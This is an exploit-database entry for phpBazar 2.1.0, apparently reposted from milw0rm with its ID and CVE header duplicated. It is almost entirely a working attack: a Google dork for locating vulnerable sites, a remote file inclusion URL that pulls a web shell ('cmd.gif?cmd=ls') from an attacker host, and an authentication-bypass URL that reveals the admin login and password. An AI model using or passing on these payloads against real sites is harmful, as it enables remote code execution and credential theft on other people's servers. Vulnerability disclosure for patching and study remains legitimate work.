phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass
| EKU-ID: 9825 | CVE: OSVDB-25701;CVE-2006-2528;OSVDB-25700;CVE-2006-2527 | OSVDB-ID: |
| Author: [Oo] | Published: 2006-05-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 9825 | CVE: OSVDB-25701;CVE-2006-2528;OSVDB-25700;CVE-2006-2527 | OSVDB-ID: |
| Author: [Oo] | Published: 2006-05-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Title: phpBazar <= 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=edit_member&value=1 # milw0rm.com [2006-05-19]